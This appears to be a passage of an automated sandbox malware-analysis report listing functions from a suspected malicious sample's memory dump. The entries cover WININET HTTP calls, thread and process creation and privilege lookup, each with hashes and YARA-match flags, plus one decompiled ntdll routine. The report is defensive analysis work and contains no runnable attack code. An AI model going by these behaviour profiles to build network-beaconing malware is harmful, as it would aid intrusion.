                                                                                • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A88938
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpOpenRequest
                                                                                • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                • API String ID: 1984915467-4016285707
                                                                                • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                                • Instruction ID: c1641e5628a7934f5cfa03e6115e4975eba2a7a208ec045cf01c694b96339843
                                                                                • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                                • Instruction Fuzzy Hash: BA01E9B2905159AFCB04DF98D941DEF7BB9EB48210F158288FD48A7304DA34ED10CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A888C6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A88938
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpOpenRequest
                                                                                • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                • API String ID: 1984915467-4016285707
                                                                                • Opcode ID: 40577d0d61336138bc75bac801066253a5c62ab29eefffa67608031ecb29e8ac
                                                                                • Instruction ID: 7c66673cae4a38978eef617ff53d3ce975ed12eb4c4b34f470e5f37a9ab2d853
                                                                                • Opcode Fuzzy Hash: 40577d0d61336138bc75bac801066253a5c62ab29eefffa67608031ecb29e8ac
                                                                                • Instruction Fuzzy Hash: 4001D7B6905159AFCB14DF88C981DEF7BB9AF48350F158188FD48AB315DB30ED118BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88946, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02A889AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpRequestSend
                                                                                • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                • API String ID: 360639707-2503632690
                                                                                • Opcode ID: 55845fd566111ad21366918098eff5cb6164c89f91251d9ce2bd53093292cd91
                                                                                • Instruction ID: 0c1d9520f195268c9224c9ea5536d09eb408f05b3613575eb4000be48aea31a2
                                                                                • Opcode Fuzzy Hash: 55845fd566111ad21366918098eff5cb6164c89f91251d9ce2bd53093292cd91
                                                                                • Instruction Fuzzy Hash: 12014FB2905119AFDB00EF98C945AEF7BB9EB58650F508158FD18AB304D770DE10CBE2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88950, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02A889AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpRequestSend
                                                                                • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                • API String ID: 360639707-2503632690
                                                                                • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                • Instruction ID: d0098793060191aa39c3b799bcc1d92e901bfbf62385df08d1d1dd7d8155c0db
                                                                                • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                • Instruction Fuzzy Hash: 11016DB2905119AFCB00DF98D945AEFBBBCEB48210F108189FD08A7304D670EE10CBE2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88850, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A888B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConnectInternet
                                                                                • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                • API String ID: 3050416762-1024195942
                                                                                • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                • Instruction ID: 3559c4dcb525a1e37d7e94bb5cb53f2c438e92ab0d884e8044e7c3ef37439d41
                                                                                • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                • Instruction Fuzzy Hash: 1401E9B2905118AFCB14DF99D941EEF77B9EB48310F154289BE08A7240D634EE10CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88847, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 47networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A888B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConnectInternet
                                                                                • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                • API String ID: 3050416762-1024195942
                                                                                • Opcode ID: 82f5ff5c5cbe2073e9236b952e3d370d6472ab244483b1843478c32671d2100a
                                                                                • Instruction ID: f7476b60acf0ba853371b9c4aedb161a8d87b9ecd415d42286f0340daf36b800
                                                                                • Opcode Fuzzy Hash: 82f5ff5c5cbe2073e9236b952e3d370d6472ab244483b1843478c32671d2100a
                                                                                • Instruction Fuzzy Hash: AC0129B2905119AFCB14DF99CD40EEF7BB9FF49354F158288BA48A7240C630EA11CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A887E0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02A88837
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InternetOpen
                                                                                • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                • API String ID: 2038078732-3155091674
                                                                                • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                • Instruction ID: 22805175768053a365ae43efdb7e1282b5b21cea02c9b0ead53657a75f7640ec
                                                                                • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                • Instruction Fuzzy Hash: F5F019B2901118AF8B14EF98DC419EBB7B9FF48350B048589BE1897301D634AE10CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A887DC, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02A88837
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InternetOpen
                                                                                • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                • API String ID: 2038078732-3155091674
                                                                                • Opcode ID: b19e08ff7fd6ea0d40064051c8d38ae74b6ac2ad4a63c6a1664fe906beace06d
                                                                                • Instruction ID: a2aedf262af781a02337f35f0d3f58bc63d0404197427a907eea43848d82a439
                                                                                • Opcode Fuzzy Hash: b19e08ff7fd6ea0d40064051c8d38ae74b6ac2ad4a63c6a1664fe906beace06d
                                                                                • Instruction Fuzzy Hash: CAF019B2901219AF8B14EF98D9819AB7BB9FF48340F048589AE1867245D734EA10CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A86EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 02A86F88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: 94b684641e4534e8a016d3b731610e62cb0c0a72e4df6f8a41d2077f6c988a8b
                                                                                • Instruction ID: 02bc7fbce26823347350a627e9012791e792dc5a8e8e21c5b1430aabeff4def2
                                                                                • Opcode Fuzzy Hash: 94b684641e4534e8a016d3b731610e62cb0c0a72e4df6f8a41d2077f6c988a8b
                                                                                • Instruction Fuzzy Hash: 853190B1641704ABD715EFA8C8A0FA7B7B8FF88700F04841DF61A9B240DB70E845CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A86ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 02A86F88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: 2c8cd4c149fcff8147979e6cd4d1025d42a5c842c8e259c2f270d90105c24093
                                                                                • Instruction ID: 807eec44228ebd532b5e4e9ba2b61c939ca2af0f7039550b764a6953aaca5308
                                                                                • Opcode Fuzzy Hash: 2c8cd4c149fcff8147979e6cd4d1025d42a5c842c8e259c2f270d90105c24093
                                                                                • Instruction Fuzzy Hash: 132191B1641301AFD711EF68C8A0FABBBB8EF48B04F04805EF6195B241DB70E455CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A884D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A73B93), ref: 02A884FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: .z`
                                                                                • API String ID: 3298025750-1441809116
                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction ID: df382aba27ec0d2dea1e0dc46b512bd0984044bb684394f7efb7d8ad7985fbc7
                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction Fuzzy Hash: 04E012B1200208ABDB18EF99CC48EA777ADAF88750F018558FA085B241DA30E9108AB0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A77260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A772BA
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A772DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                • Instruction ID: 1a46065c466b72cd591cf3bd36391a1fd7f7fd1cf397d012ba2467242ae11b19
                                                                                • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                • Instruction Fuzzy Hash: FE01A231A8032976EB20B6948D42FFFB76C9B40B50F150159FF04BA1C1EA9479068BFA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A77233, Relevance: 3.0, APIs: 2, Instructions: 41threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A772BA
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A772DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                • Instruction ID: 7843071a9bf9f893e70af8e95413de61aec89d924153c4b500ae497d01c388cd
                                                                                • Opcode Fuzzy Hash: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                • Instruction Fuzzy Hash: 1CF02E31E802253AF72497545C03FFEF7989B80B11F14416EFE44E91C1EB915805CAE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A87005, Relevance: 1.6, APIs: 1, Instructions: 118threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A7CCD0,?,?), ref: 02A8704C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                • Instruction ID: b5ced711c1a19a7d7d152d57f753adaaa11a0c01136732b30691f7de8d221c04
                                                                                • Opcode Fuzzy Hash: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                • Instruction Fuzzy Hash: 3041DDB6241705AFD325EB74CDA0FE7B3A9BF84384F540419F61A97280DB31B819CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A79B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A79B92
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                • Instruction ID: d955255300f7607e98d17ddbace136298a6b8de4323205b6f976579c7d749e28
                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                • Instruction Fuzzy Hash: 7E011EB5D4020EABDF10EBA4DD81F9EB7B99B44308F004195AA0897241FA31EB18CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A88594
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction ID: 0781a2b7bf93cf9ad92eeb5bea1d309b47809409adca200782986232a2f3c8ce
                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction Fuzzy Hash: CF0154B2214108AFCB54DF89DC80EEB77ADAF8C754F558258FA0D97251DA30E851CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88621, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A7CFA2,02A7CFA2,?,00000000,?,?), ref: 02A88660
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
                                                                                • Instruction ID: 51d3fd666d68c4cd2cb14b82ee6bf306fdb9cb4d800f24ea4730b77b98abdb84
                                                                                • Opcode Fuzzy Hash: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
                                                                                • Instruction Fuzzy Hash: 56F06DB62042086FDB24EFA5DC84EEB77ADEF88350F148659F94D97601DA34A9108BB0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A87010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A7CCD0,?,?), ref: 02A8704C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                • Instruction ID: be7700723f3ae45ac81c53d6f1c84be0baaf7d62b1c2e9a10d1d2f6bfc091fec
                                                                                • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                • Instruction Fuzzy Hash: 22E092333D03043AE73075A99C02FA7B39DCB81B20F580066FB0DEB2C1D995F80146A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A772E4, Relevance: 1.5, APIs: 1, Instructions: 25threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A772DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
                                                                                • Instruction ID: 9a2227c231692e3c1be33e9d33710c3637e8fb5867c4ab5f08c72deee4b251a5
                                                                                • Opcode Fuzzy Hash: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
                                                                                • Instruction Fuzzy Hash: 6FE02B2538025415F711A798EC02FFEB698D763B52F44016EF9C4C62C2ED85110D57F2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A7CFA2,02A7CFA2,?,00000000,?,?), ref: 02A88660
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction ID: b3c56a20db90cc79c3d1b4620cf7da006d1d68092c12458560001d37f7171a00
                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction Fuzzy Hash: 0FE01AB12002086BDB10EF49CC84EE737ADAF88750F018554FA0857241D934E8108BF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(02A83516,?,02A83C8F,02A83C8F,?,02A83516,?,?,?,?,?,00000000,00000000,?), ref: 02A884BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction ID: bfd9e134d8da58805d4233bbc54a7a5f5f37241605896766a0e9a5941d7d04b5
                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction Fuzzy Hash: 2CE012B1200208ABDB14EF99CC40EA777ADAF88750F118558FA085B241CA30F9108AB0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A7D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02A77C63,?), ref: 02A7D43B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                • Instruction ID: a720114bf94293c0cebfc953ae8a6f0376b0278ad8b7e69291b2a1395f9fccdb
                                                                                • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                • Instruction Fuzzy Hash: 2BD05E627A03043AEA10BBA8DC02F2632CD5B54A04F4940A4F949A62C3DE50E4004965
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6bdc6116e14755c8cf1004c510c920efc3fbb3371f567df1fee7e7e9f44c3098
                                                                                • Instruction ID: 6f4d3d3e83f9499f2f95a61fb10ffc40a327a91af5404bfeb77260f3c74388be
                                                                                • Opcode Fuzzy Hash: 6bdc6116e14755c8cf1004c510c920efc3fbb3371f567df1fee7e7e9f44c3098
                                                                                • Instruction Fuzzy Hash: 3DB09BB19014C5CAFB11D7615608717795177D4745F17C051D1030651B4B78D0D5F5B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 04DAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E04DAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04DA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04DA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                0x04dafdda
                                                                                0x04dafde2
                                                                                0x04dafde5
                                                                                0x04dafdec
                                                                                0x04dafdfa
                                                                                0x04dafdff
                                                                                0x04dafe0a
                                                                                0x04dafe0f
                                                                                0x04dafe17
                                                                                0x04dafe1e
                                                                                0x04dafe19
                                                                                0x04dafe19
                                                                                0x04dafe19
                                                                                0x04dafe20
                                                                                0x04dafe21
                                                                                0x04dafe22
                                                                                0x04dafe25
                                                                                0x04dafe40

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DAFDFA
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DAFE01
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DAFE2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: 64d8b57fb39c4c469d053b05a908f642674bbf350ce38fb917142c5dc532da63
                                                                                • Instruction ID: d3a9187939e2a0721159f90f3ef6b552bc4ed18dd5d3e21df153cb0b408019f6
                                                                                • Opcode Fuzzy Hash: 64d8b57fb39c4c469d053b05a908f642674bbf350ce38fb917142c5dc532da63
                                                                                • Instruction Fuzzy Hash: A8F0F632200201BFEA201A45DC06F37BF6AEB44730F244355F628561E1EA62FD30D6F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%